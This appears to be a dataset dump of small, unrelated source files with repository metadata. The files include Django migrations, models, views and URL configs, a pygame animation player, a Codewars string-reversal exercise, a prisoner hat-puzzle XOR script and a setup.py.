61729e5a03e1c4aa8b0f6c6462fefde695f3b276 | 8300b53991e4bb2b7544e21240273d194dbe567b | /comp/migrations/0004_auto_20210104_1347.py | 286095e718fb96d2b2646852cc357a3385a98fc0 | [] | no_license | chaps78/CV_project_V2 | a60426de4f8af61ec4ad7f28278b7dc0ee114fef | cc77e864698f005ed0989b3b363ef789eb73c6c6 | refs/heads/main | 2023-04-22T13:11:48.496979 | 2021-05-08T15:17:15 | 2021-05-08T15:17:15 | 361,686,287 | 0 | 0 | null | 2021-05-01T15:01:32 | 2021-04-26T09:09:13 | JavaScript | UTF-8 | Python | false | false | 394 | py | # Generated by Django 3.1.4 on 2021-01-04 13:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the ``comp`` app."""

    # Must be applied after migration 0003 of the same app.
    dependencies = [
        ('comp', '0003_auto_20210103_2026'),
    ]

    # Redefines Experiences.logo_client as a plain CharField (max 200 chars).
    operations = [
        migrations.AlterField(
            model_name='experiences',
            name='logo_client',
            field=models.CharField(max_length=200),
        ),
    ]
| [
"cyrille.chapuis@gmail.com"
] | cyrille.chapuis@gmail.com |
a914dad700cb4f51f4f78b503850c3b539eb8bac | 9b0b1902c4ae528b9ecf2d4a3c11d6e59a964d6e | /django-auth-tutorial-master/accounts/migrations/0001_initial.py | 78f5e3ce0d70ebe2eccab02659b76ade4cec2d61 | [] | no_license | radhac88/SMNS | d4330a4bba750a00c25f023562959ee8cd1529e7 | ec27e206cf7ebb84d7691c20c88e91ce2067a002 | refs/heads/master | 2020-03-21T12:56:38.310033 | 2018-11-30T06:04:06 | 2018-11-30T06:04:06 | 138,579,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | # Generated by Django 2.1.2 on 2018-10-25 09:23
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the ``accounts`` app: creates the Tweet table."""

    initial = True

    # Depends on whichever user model the project configures as AUTH_USER_MODEL.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Tweet',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('text', models.CharField(max_length=160)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('profile_image', models.ImageField(blank=True, null=True, upload_to='post_image')),
                # NOTE(review): ForeignKey(unique=True) behaves like a one-to-one
                # relation; Django recommends OneToOneField for this — do not
                # change here, since migrations must stay immutable.
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, unique=True)),
            ],
        ),
    ]
| [
"surya.kala@etggs.net"
] | surya.kala@etggs.net |
a85eca58f0c19dea7674254798bcf77bb60ed9b8 | a882ccf759025735f926695d6a5a39937854646a | /e_step4/pygame00.py | a91f3f96979ff338f83cd1d55dc042ebde65d456 | [] | no_license | muzudho/practice-open-cv2 | 5c1534564bcf43c2d8f7a6fb4ee1583bd77337f9 | 55af5cfb37587b08123b404cf8768d83148cb046 | refs/heads/main | 2023-07-08T02:23:22.984816 | 2021-08-10T10:45:01 | 2021-08-10T10:45:01 | 349,864,518 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,820 | py | """coding: utf -8
"""
# Module imports
import sys
import time
import pygame
from pygame.locals import QUIT
# Initialise pygame
pygame.init()
# Load the images
# FRAME_COUNT = 380
FRAME_COUNT = 528
#FRAME_COUNT = 960
# FRAME_COUNT = 4560
#FRAME_COUNT = 1520
FPS = 8 # e.g. if the frames were captured at 15 fps, about half that FPS still looks smooth
IMAGE1 = pygame.image.load('./@share/out-cstep4-0.png')
IMAGE1_W = IMAGE1.get_width() # width of the image
IMAGE1_H = IMAGE1.get_height() # height of the image
DISPLAY_SIZE = (IMAGE1_W, IMAGE1_H) # width, height
SURFACE = pygame.display.set_mode(DISPLAY_SIZE) # application window
pygame.display.set_caption('Application: pygame00.py')
CLOCK = pygame.time.Clock() # Clock object used to control the frame rate
# Preload every frame image
FRAMES = []
for i in range(0, FRAME_COUNT):
    IMAGE1 = pygame.image.load(f'./@share/out-cstep4-{i}.png')
    FRAMES.append(IMAGE1)
# Main loop
WHITE = (255, 255, 255)
TOP_LEFT_P = (0, 0) # x, y
for j in range(0, 1): # number of playback passes (1 = play once, 2 = twice)
    for i in range(0, FRAME_COUNT):
        # SURFACE.fill(WHITE) # background colour
        SURFACE.blit(FRAMES[i], TOP_LEFT_P) # draw the current frame
        # Process the event queue
        for ev in pygame.event.get():
            if ev.type == QUIT: # "quit" event
                pygame.quit()
                print('quitting...')
                sys.exit()
        # Refresh the display
        pygame.display.update()
        if j == 0 and i == 0:
            time.sleep(3) # Seconds
        # Frame-rate control
        CLOCK.tick(FPS) # run at the configured fps
    time.sleep(3) # Seconds
| [
"muzudho1@gmail.com"
] | muzudho1@gmail.com |
b85a75aeafda4547a9db1b598e1d8f93af10c136 | 3b628230666e2324b325d29ed8997a905dcba291 | /web/views/report.py | 17aff5f6356ae5632f81eedc4114595ae36f8fbe | [] | no_license | emohamed/obshtestvo.bg | 9f67734776ecdef5dfc5238a9caabd97c5e80cbd | b90c547a880294cc84956eb926413fb7118be133 | refs/heads/master | 2020-12-25T20:30:38.667603 | 2016-01-06T16:44:33 | 2016-01-06T16:46:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from django.views.generic.base import View
from restful.decorators import restful_view_templates
@restful_view_templates
class ReportView(View):
    """Serves the inner report page."""

    def get(self, request):
        """Build the template context for a GET request."""
        context = {"page": "inner report"}
        return context
| [
"antitoxic@gmail.com"
] | antitoxic@gmail.com |
5cff3b1bc33ede63cb9e3659512f0fba13214867 | c112ad9cd1f60a4f301a2c5d8bf589a53caffffa | /poll/poll/urls.py | dd2f3c0d6a16565db30bd0890ce49dfda24ac3a5 | [] | no_license | HaliullinAnton/Poll | 95256760263fc7fd50d2b5776b6bc3732993d9ae | bfb71f21d4f74458f5e54c9ce34cac744b5ff881 | refs/heads/master | 2023-07-12T12:27:28.992957 | 2021-08-11T14:03:55 | 2021-08-11T14:03:55 | 395,005,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | """poll URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# URL routing table: the Django admin plus the polls app's own urlconf.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('polls/', include('polls.urls')),
]
| [
"[haliullinanton@gmail.com]"
] | [haliullinanton@gmail.com] |
77bf3568089d84dca57ebccf21f5df9caf089b6b | c1a9436f38714277b063d76af47e8b9448d5cc73 | /CRO/Molecule.py | 25eaa41d932d1644507e279a2297edc8bc7924ea | [] | no_license | rakib06/LearnPythonBasic | 83f5bf5c63a40e8d5f93ac3ffa0d0443fdc0519a | fc0b81850e76d38c6816bd9fe81b442b68d6bd75 | refs/heads/master | 2020-09-01T01:03:49.087763 | 2019-12-25T23:11:09 | 2019-12-25T23:11:09 | 218,835,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | def spin_words(sentence):
    # Split into words, reversing any word of five or more characters,
    # then stitch the words back together separated by single spaces.
    my_list = sentence.split()
    result = ''
    for i in range(len(my_list)):
        x = my_list[i]
        if len(x) >= 5:
            # Long word: reverse it via slicing.
            x = x[::-1]
        if i != 0:
            result = result + ' ' + x
        else:
            # First word: no leading separator.
            result += x
    return result
# Sample sentence whose long words are pre-reversed (Codewars "spin words" kata
# fixture): feeding it through the spinner un-reverses those words.
s = 'rettel rettel Kata than in etirW than desrever the in gnirts gnirts'
def spin_word_kata(sentence):
    """Reverse every word of five or more letters, leaving the rest intact."""
    spun = []
    for word in sentence.split():
        spun.append(word[::-1] if len(word) >= 5 else word)
    return " ".join(spun)
# Demo: un-reverse the sample sentence, then show basic str.join usage.
print(spin_word_kata(s))
my_list = ['hello', 'how', 'are', 'you']
print(' '.join(my_list), end='\n')
# Reverse every word except 'you' before joining.
print(' '.join([x[::-1] if x != 'you' else x for x in my_list]))
"six.rakib@gmail.com"
] | six.rakib@gmail.com |
b99a928c8fc0e398ba790ae56619558cdf251bf0 | a9bffb96e00908f1f2134217685f46adcccd8bc6 | /random-collection/hats-see-front/xortest.py | b3918de3421dc58514284c9ef3e10be919955e3b | [] | no_license | frumpel/coding-questions | 0f498679d23127c269f452f1c3f1f46c69c4e320 | d5fd82cc6edd0299e9e02d73e639f40880bb13cd | refs/heads/master | 2021-01-22T05:38:48.066401 | 2019-03-24T21:29:00 | 2019-03-24T21:29:00 | 81,686,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,465 | py | """
Problem statement:
* death row prisoners are given a chance to go free if they guess their hat
* they can talk to each other
* they can only see the hats in front of them, not behind them
* they can say a color but nobody knows if it was right or not
* expected: save all but one and the last has a 50%% chance
Approach:
* blue - 0
* red - 1
* everyone counts the number of transitions flipping the bit starting with blue == no transitions
* last person gives the number of transitions = 50%
* everyone else counts transtions
"""
import random
num_prisoners = 10
def calc_xor(src):
    """Return the XOR (parity) of all hat values in *src*.

    XOR is commutative and associative, so a simple forward fold is
    equivalent to the original right-to-left accumulation.  Starting from
    0 (the XOR identity) also makes the empty list well-defined instead of
    raising IndexError on ``src[len(src)-1]``.
    """
    xor = 0
    for bit in src:
        xor ^= bit
    return xor
# NOTE(review): this script uses Python 2 print statements throughout.
# Create a random list of hat assignments
src = [random.randrange(2) for x in range(num_prisoners)]
# Initialize temporary data arrays
# NOTE(review): `crc` is never read anywhere below — candidate for removal.
crc = [False for x in range(num_prisoners)]
ans = [-1 for x in range(num_prisoners)]
# First prisoner answers with the XOR checksum
ans[0] = calc_xor(src[1:])
# All other prisoners answer with xor(hats they see)^xor(what prisoners have said)
for ii in range(1,num_prisoners):
    # Calculate the XOR checksum - note that the checksum is already in ans[0]
    ans[ii] = calc_xor(ans[:ii] + src[ii+1:])
# Output
print "Hats (looking right):",src
print "Prisoner says:       ",ans
print "Is it true?          ",[ans[ii]==src[ii] for ii in range(len(src))]
| [
"potucek@rppower3.local"
] | potucek@rppower3.local |
02c2c129135e6b8b655b6a7764566dd3e703f0b2 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_13280.py | 2846b517a21df83a34ad11137da1ded0a3e9d792 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | # Django: Formset for adding captions to uploaded images
{{ form.instance.resized_img }}
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
0c3be3e50dc17d814ee948f1c54eb591fd5feb1f | 1337df464d8b4b41bd46c5d045a3a3192f09750b | /OS模块/os01.py | f54d14bb8b8bf6c6ed55d73352ba5d033fc3f7ed | [] | no_license | Maroonlk/untitled2 | 8ffad3252aea3780af29ff5acecc1085c3cf0471 | 8b0d36df6e814e1e2c72d9242b4134acf3a90270 | refs/heads/master | 2020-03-18T16:03:49.957280 | 2018-07-09T09:59:05 | 2018-07-09T09:59:05 | 134,944,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | # getcwd() 获取当前的工作目录
# Usage: os.getcwd()
# Returns: the current working directory as a string
import os
# help() writes the documentation for os.makedirs to stdout and returns
# None, so this line also prints "None".
print(help(os.makedirs))
print(os.name)  # platform identifier, e.g. 'posix' or 'nt'
print(os.sep)  # path separator for the current platform
"821365628@qq.com"
] | 821365628@qq.com |
a25ba26330eaf450d7af6eb13d30bf97f488af8f | 74e9116965365053f9deed1b2761a5d4cb77969b | /setup.py | 390a65932db9248d946ae400b70331edc15c1f6e | [] | no_license | ManivannanPeriathambi/PythonPackage | dfe107c50f3d682f263f374661b5bf3360fb56b4 | b3f473d4fe64cf37f2e0bc9923a95063ac2a324e | refs/heads/master | 2016-09-14T04:23:41.479440 | 2016-04-18T15:09:01 | 2016-04-18T15:09:01 | 56,467,148 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | import sys
from setuptools import setup, find_packages
# Package metadata for setuptools.
# NOTE(review): `datafile` is not a standard setup() keyword — verify the
# intent (likely meant data_files); it is currently passed through unused.
setup(name='Sample',
      version='1.0.0', # @UndefinedVariable
      description='Sample python module for package demo',
      url='https://github.com/ManivannanPeriathambi/PythonPackage.git',
      author='Manivannan Periathambi',
      author_email='manivannan.periathambi@gmail.com',
      license='MIT',
      packages=find_packages(exclude=['docs','tests*']),
      zip_safe=True,
      datafile=None)
"manivannan.periathambi@gmail.com"
] | manivannan.periathambi@gmail.com |
fc6599f1facb962365ee1e1292ec29b2f9baacb8 | 281c7a748aee9b5de82d3ad6d0b9caf5f5ebe862 | /produto/models.py | 1c0a81ee4132f863194bf8d5d70fb91c9009bab2 | [] | no_license | robertocorreajr/ecommerce | 2a0f1b8ce6154e7fbc71fdf205e04952aaabc669 | e808696629d315acff1a1e9f5a6ee25d265d069c | refs/heads/master | 2023-07-21T15:32:53.092149 | 2021-08-13T21:21:06 | 2021-08-13T21:21:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | from django.db import models
# Create your models here.
class Produto(models.Model):
    """Catalogue product: either a simple item ('S') or the parent of
    variations ('V')."""

    nome = models.CharField(max_length=255)
    # Short blurb for listings.  NOTE(review): max_length on a TextField is
    # used only by forms, not enforced at the database level — confirm intent.
    descricao_curta = models.TextField(max_length=255)
    descricao_longa = models.TextField()
    # Optional product photo, stored under produto_imagem/<year>/<month>.
    imagem = models.ImageField(
        upload_to='produto_imagem/%y/%m', blank=True, null=True)
    slug = models.SlugField(unique=True)
    # Prices kept as floats; promotional price defaults to 0 (no promotion).
    preco_marketing = models.FloatField()
    preco_marketing_promocional = models.FloatField(default=0)
    # 'V' = product with variations, 'S' = simple product.
    tipo = models.CharField(
        default='V',
        max_length=1,
        choices=(
            ('V', 'Variação'),
            ('S', 'Simples'),
        )
    )

    def __str__(self):
        # Display the product by its name in the admin and the shell.
        return self.nome
| [
"rc.lima.jr@gmail.com"
] | rc.lima.jr@gmail.com |
1a539493e0d2462c4b574a303523a1e5caf19b45 | 23b053acbf74e57e897672cc7875377d7b6141c9 | /djangoproject/brew/migrations/0013_auto__del_field_mashlog_mashingschemeitem_started__add_field_mashlog_a.py | 272cbe8b4fd57a268ae73bde6e09c0fd54c33723 | [
"ISC"
] | permissive | StryKaizer/Brew | a485a900b8072677efce704d3e773b6eefb57e6e | 09780bc8b9fd6e6e5f952f2219d0c4dd25a6e526 | refs/heads/master | 2021-01-22T13:37:49.077968 | 2013-03-18T22:33:54 | 2013-03-18T22:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,708 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: replaces MashLog.mashingschemeitem_started
    with a required active_mashing_scheme_item FK and adds a status field."""

    def forwards(self, orm):
        # Deleting field 'MashLog.mashingschemeitem_started'
        db.delete_column('brew_mashlog', 'mashingschemeitem_started_id')

        # Adding field 'MashLog.active_mashing_scheme_item'
        db.add_column('brew_mashlog', 'active_mashing_scheme_item',
                      self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['brew.MashingSchemeItem']),
                      keep_default=False)

        # Adding field 'MashLog.status'
        db.add_column('brew_mashlog', 'status',
                      self.gf('django.db.models.fields.CharField')(default=None, max_length=1),
                      keep_default=False)

    def backwards(self, orm):
        # Reverse of forwards(): restore the old nullable FK, drop the new columns.
        # Adding field 'MashLog.mashingschemeitem_started'
        db.add_column('brew_mashlog', 'mashingschemeitem_started',
                      self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['brew.MashingSchemeItem'], null=True, blank=True),
                      keep_default=False)

        # Deleting field 'MashLog.active_mashing_scheme_item'
        db.delete_column('brew_mashlog', 'active_mashing_scheme_item_id')

        # Deleting field 'MashLog.status'
        db.delete_column('brew_mashlog', 'status')

    # Frozen ORM snapshot used by South to build the `orm` argument above.
    models = {
        'brew.batch': {
            'Meta': {'object_name': 'Batch'},
            'brewing_date': ('django.db.models.fields.DateTimeField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'mashing_scheme': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['brew.MashingScheme']"}),
            'number': ('django.db.models.fields.IntegerField', [], {'max_length': '3'})
        },
        'brew.mashingscheme': {
            'Meta': {'object_name': 'MashingScheme'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'brew.mashingschemeitem': {
            'Meta': {'object_name': 'MashingSchemeItem'},
            'degrees': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'mashing_scheme': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['brew.MashingScheme']"}),
            'minutes': ('django.db.models.fields.CharField', [], {'max_length': '3'})
        },
        'brew.mashlog': {
            'Meta': {'object_name': 'MashLog'},
            'active_mashing_scheme_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['brew.MashingSchemeItem']"}),
            'batch': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['brew.Batch']"}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'degrees': ('django.db.models.fields.FloatField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'status': ('django.db.models.fields.CharField', [], {'max_length': '1'})
        },
        'brew.variable': {
            'Meta': {'object_name': 'Variable'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'key': ('django.db.models.fields.CharField', [], {'max_length': '127'}),
            'value': ('django.db.models.fields.CharField', [], {'max_length': '255'})
        }
    }

    complete_apps = ['brew']
"jimmyhdx@gmail.com"
] | jimmyhdx@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.